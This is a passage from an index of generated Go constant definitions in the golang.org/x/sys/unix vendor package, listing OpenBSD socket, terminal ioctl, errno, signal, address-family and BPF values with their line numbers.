SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_arm64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc010427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80104277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W 